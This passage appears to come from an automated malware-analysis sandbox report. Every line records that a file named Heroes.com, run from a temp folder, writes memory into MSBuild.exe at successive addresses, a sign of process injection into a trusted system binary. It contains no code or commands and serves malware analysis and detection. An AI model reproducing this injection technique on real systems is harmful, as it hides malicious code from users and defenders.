                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343CF0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343D54Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343DB8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343E1CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343E80Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343EE4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343F48Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1343FACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344010Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344074Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13440D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134413CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13441A0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344204Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344268Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13442CCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344330Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344394Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13443F8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134445CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13444C0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344524Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344588Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13445ECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344650Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13446B4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344718Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134477CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13447E0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344844Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13448A8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134490CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344970Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13449D4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344A38Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344A9CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344B00Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344B64Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344BC8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344C2CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344C90Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344CF4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344D58Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344DBCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344E20Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344E84Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344EE8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344F4CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1344FB0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345014Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345078Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13450DCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345140Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13451A4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345208Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134526CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13452D0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345334Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345398Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13453FCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345460Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13454C4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345528Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134558CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13455F0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345654Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13456B8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134571CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345780Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13457E4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345848Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13458ACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345910Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345974Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13459D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345A3CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345AA0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345B04Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345B68Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345BCCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345C30Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345C94Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345CF8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345D5CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345DC0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345E24Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345E88Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345EECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345F50Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1345FB4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346018Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134607CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13460E0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346144Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13461A8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134620CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346270Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13462D4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346338Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134639CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346400Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346464Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13464C8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134652CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346590Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13465F4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346658Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13466BCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346720Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346784Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13467E8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134684CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13468B0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346914Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346978Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13469DCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346A40Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346AA4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346B08Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346B6CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346BD0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346C34Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346C98Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346CFCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346D60Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346DC4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346E28Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346E8CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346EF0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346F54Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1346FB8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134701CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347080Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13470E4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347148Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13471ACJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347210Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347274Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13472D8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134733CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13473A0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347404Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347468Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13474CCJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347530Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347594Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13475F8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134765CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13476C0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347724Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347788Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13477ECJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347850Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13478B4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347918Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 134797CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 13479E0Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347A44Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347AA8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347B0CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347B70Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347BD4Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347C38Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347C9CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347D00Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347D64Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347DC8Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347E2CJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\611485\Heroes.comMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 1347E90Jump to behavior
